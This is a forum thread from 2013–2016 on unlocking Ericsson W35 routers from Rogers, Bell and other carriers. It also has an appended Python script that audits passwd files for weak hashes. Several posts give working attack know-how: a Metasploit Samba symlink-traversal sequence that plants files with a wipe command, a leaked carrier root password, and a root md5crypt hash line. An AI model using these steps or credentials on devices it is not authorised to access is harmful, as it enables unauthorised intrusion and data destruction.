if you follow the unlock procedure, you will end up with an Ericsson W35 which is totally reset, and has lost not only all of its Rogers-specific settings, but also any settings you may have used to configure the device.
I will not try to discourage you from following the unlock procedure. But please note, that if you do, you need to have made a record of the settings on the device previous to your following the unlock procedure. This is needed so you can reconfigure the W35 to allow you to reconnect to the Rogers cell network. In particular, take a close look at, and make a record of, the settings on the "Internet" page of the web management interface. You will need to restore these after the unlock process to allow you, once again to connect to the Rogers network.
As well, you need to restore whatever settings you had on the Wireless and LAN web management pages.

Of course, if you are connecting to another cell network entirely, then you will likely need different settings to allow you to connect that particular cell network.

And, yes, it is definitely recommended that you obtain the System Admin Guide for the W35.

Good Luck!

westofanywhere

nanakomeah
10th November, 2013, 02:22 PM
@westofanywhere Do you perchance know the root password for the non-Rogers ones...?

westofanywhere
12th November, 2013, 02:27 AM
@nanakomeah:

the root password depends on whether you have a default stock Ericsson W35, or one provided by a carrier who has put customized firmware on the little beastie.

The stock W35 default passwords can be found in the Sys Admin Guide. Any other will need to be obtained from the relevant carrier/provider.

westofanywhere

nanakomeah
12th November, 2013, 03:47 PM
little beastie ....Say it again, lol So apart from the stock ones that have the login credentials in the admin guide don't u know how or a software i can use to unlock.

westofanywhere
15th November, 2013, 03:18 AM
@nanakomeah:

that is exactly right. It is only recently that I became aware of the root password that would allow access to, and the unlock of, the Rogers variant of the W35. Basically, any cellular ISP that provides the Ericsson W35 usually set them up with their own passwords.

westofanywhere

markko
21st December, 2013, 08:43 PM
I'd appreciate any pointers or tips re: what settings to save or replace if I unlock my Rogers branded Ericsson W35 using the previously noted instructions. I ended service with Rogers and want to use the hub as a mifi type device when traveling in the US. I think I'd opt for a service that uses AT&T's network. As a side note, the hub as it is works with Fido's service. I just changed the APN to one of Fido's and it worked. (Rogers owns Fido) Do you think it will work as it is (just change to AT&T APN) or will I need to unlock it?

macovet
12th April, 2014, 10:24 PM
Hello all - nice to find this thread!

I have the Bell's Ericsson W35 Data & Voice Terminal.
I did a firmware upgrade to version w35-006-R12C003.arc

After the upgrade, it seems that the router has been locked.
I am trying to connect through the web interface with password 'user' and I am getting the following message :
-Enter password to access personalization options.
-Password: user
- 'The system database cannot be accessed right now, since it is locked. Please wait and retry later. Press back and correct the error.'
The same through telnet.

some specs:
Before Upgrade:
Product Id:KRC 101 1467/14 R2B
Boot Loader: CXC 172 7029 R1A (Dec 9 2008)
Application Software: CXC 172 7031 R13B (Nov 18 2010)


My upgrade was with w35-006-R12C003.arc firmware.
Any suggestions?

jdupek
12th May, 2014, 11:38 PM
can you flush with an original firmware version?

macovet
13th May, 2014, 12:08 AM
can you flush with an original firmware version?

Well, I can't login to the web interface. Is there a way to cold flush without login?

jdupek
3rd June, 2014, 06:06 AM
this is from ericssonw35.com, can you ask Rogers to provide you with their original firmware file?

Important

Attn: Bell, Rogers & Telstra Customers
Using this firmware will corrupt your W35's software and cause the warranty to be void. Please contact your carrier for software updates.

(i) Please Note: Firmware upgrades are done at your own risk.

(ii) A reboot before upgrading is recommended

(iii) If your current firmware revision does not appear in the list above then it is highly likely you have unique firmware from your carrier, if this is the case upgrading using the above firmware may cause your unit to become inoperable. Contact your carrier for a software upgrade file.

(iv) WLAN needs to be turned off to conserve memory during the upgrade.

(v) Files do not need to be uncompressed.

slyaskiw
30th July, 2014, 02:03 PM
I found an interesting thread with the root user and password.

Rocket Hub a.k.a Ericsson W35 Official Rogers Unlo... - Page 6 - Rogers Community (http://communityforums.rogers.com/t5/forums/forumtopicpage/board-id/MobileInternet/thread-id/145/page/6)

Hope this helps unlock the W35.

denvalicious
25th February, 2015, 12:38 PM
Interesting thread but I don't understand

How can i get my ericsson w35 from zain Ghana unlocked ?

denvalicious
10th June, 2015, 06:01 PM
Am still asking if anyone has a success story about unlocking this ericsson w35 router

tr3ce13
16th August, 2015, 09:59 AM
format a flash drive ext2, make rw directory & put into w35
open metasploit-framework console
samba symlink directory traversal
use auxiliary/admin/smb/samba_symlink_traversal
set RHOST 192.168.1.1
set SMBSHARE your_share
set SMBTARGET rw_dir/rootfs
exploit

add nat port on web interface and don't close.

create portforward router-cleanup.sh and staticroutes files with only this line
cd /;rwwipe files

copy 3 files to smb://192.168.1.1/your_share/rw_dir/rootfs/tmp/

go to navigator and refresh nat page (F5)

oooppp database error !!!!

wait 15 seconds, unplug ac & replug.

unbranded and root with default root password, feb.07

but sierra MC8790V still locked :-(

my operator passwd file, metasploit faster than john :-p

root:$1$85W4UCwy$4rTH.lqYhFkdmjrbEq8Rr.:0:0:root:/root:/bin/sh
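
The post above ends with a passwd-format line whose second field holds a `$1$` (md5crypt) hash directly, rather than an `x` pointing at a shadow file. As an added example (not part of the original post or of any Ericsson tooling), this Python script audits passwd(5)-format text for hashes exposed in the passwd file and for weak crypt(3) schemes; the sample reuses that one line plus two constructed entries, and the function names are hypothetical.

```python
import re

# Constructed sample: the first entry is the line quoted in the post above;
# the other two are made-up entries for contrast.
SAMPLE_PASSWD = """\
root:$1$85W4UCwy$4rTH.lqYhFkdmjrbEq8Rr.:0:0:root:/root:/bin/sh
operator:x:500:500:operator:/home/operator:/bin/sh
nobody:*:65534:65534:nobody:/nonexistent:/bin/false
"""

# crypt(3) prefix pattern -> (scheme name, weak by current standards?)
SCHEMES = [
    (r"^\$1\$", "md5crypt", True),
    (r"^\$2[abxy]?\$", "bcrypt", False),
    (r"^\$5\$", "sha256crypt", False),
    (r"^\$6\$", "sha512crypt", False),
    (r"^\$y\$", "yescrypt", False),
    (r"^[./0-9A-Za-z]{13}$", "descrypt", True),
]

def classify(field):
    """Return (scheme, weak) for the second field of a passwd record."""
    if field == "x" or field.startswith(("!", "*")):
        return ("none-or-shadowed", False)   # shadowed or locked account
    if field == "":
        return ("empty-password", True)      # login without a password
    for pattern, name, weak in SCHEMES:
        if re.match(pattern, field):
            return (name, weak)
    return ("unknown", True)                 # treat unrecognised as suspect

def audit_passwd(text):
    """Return a finding for every account whose hash sits in passwd itself."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        parts = line.split(":")
        if len(parts) != 7:
            continue                         # not a passwd(5) record
        user, field, uid = parts[0], parts[1], parts[2]
        scheme, weak = classify(field)
        if scheme == "none-or-shadowed":
            continue
        findings.append({"line": lineno, "user": user, "scheme": scheme,
                         "weak": weak, "uid0": uid == "0"})
    return findings

if __name__ == "__main__":
    for finding in audit_passwd(SAMPLE_PASSWD):
        print(finding)
```
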

kevinds
29th August, 2015, 08:20 AM
Yes, very easy for the Rogers version...

root password is:
R0ger5

Log into the CLI, SSH on 22

Enter this command:
rwclean files

Wait 2-3 minutes, then power cycle..

New root password is:
feb.07

W35 wasn't SIM locked, just firmware locked.. :) Rogers' anyways

@tr3ce13 I may try this on a Bell one in a few days

Is the directory in the ext2 flash drive, 'rw' or 'rw_dir' ? I see your further instructions have 'rw_dir' in the path.
Also might try using ShellShock to do this... Unfortunately it has been a while since I played with the W35, and my Linux skills aren't that high, but worth a try right? ;)

tr3ce13
2nd September, 2015, 04:52 PM
Yes, very easy for the Rogers version...


Is the directory in the ext2 flash drive, 'rw' or 'rw_dir' ? I see your further instructions have 'rw_dir' in the path.
Also might try using ShellShock to do this... Unfortunately it has been a while since I played with the W35, and my Linux skills aren't that high, but worth a try right? ;)

Any dir with rw permissions, change name as you want

Richyboo
11th November, 2016, 03:35 AM
So great seniors on this wonderful thread, pls for novices like myself who don't have an idea as to how these command editing work, pls how can we go about unlocking the w35

Richyboo
11th November, 2016, 03:36 AM
I see the commands alright but I don't know how to go about it, pls help
